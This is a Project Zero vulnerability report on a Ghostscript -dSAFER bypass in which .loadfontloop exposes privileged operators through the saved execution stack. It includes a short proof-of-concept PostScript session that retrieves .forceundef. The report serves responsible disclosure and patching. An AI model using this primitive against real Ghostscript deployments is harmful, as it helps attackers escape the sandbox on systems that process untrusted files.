Ghostscript suffers from an issue where .loadfontloop exposes system operators in the saved execution stack.
f56f6e290aa802089d31f8990302cc11931c689380900d290b6f5d35582d007b
ghostscript: .loadfontloop exposes system operators in saved execution stack.
While testing the fix for <a href="/p/project-zero/issues/detail?id=1690" title="ghostscript: $error object can expose system operators in saved execution stack." class="closed_ref" rel="nofollow"> bug 1690 </a>, I found a variation that still works:
$ ./gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>systemdict /.loadfontloop get stopped == clear
true
GS>$error /estack get 27 get 18 get 14 get ==
--.forceundef--
GS>
.forceundef is bad enough, but .putgstringcopy is also in there, which is basically a wrapper around .forceput.
Filed upstream as <a href="https://bugs.ghostscript.com/show_bug.cgi?id=699938" title="" class="" rel="nofollow">https://bugs.ghostscript.com/show_bug.cgi?id=699938</a>
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Found by: taviso